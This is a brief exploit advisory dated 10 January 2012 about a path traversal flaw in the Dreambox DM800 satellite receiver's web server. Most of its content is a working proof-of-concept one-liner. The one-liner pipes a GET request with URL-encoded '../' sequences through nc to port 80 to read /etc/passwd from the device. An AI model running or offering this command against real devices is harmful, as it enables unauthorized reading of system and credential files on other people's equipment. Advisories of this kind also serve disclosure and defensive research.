Dreambox DM800 Path Traversal

Posted on 10 January 2012

Dreambox DM800 traversal path exploit Dreambox DM800 suffers from traversal path exploit With standard GET command we can retreive /etc/passwd PoC: echo -e 'GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1 ' | nc <ip> 80 , Neusbeer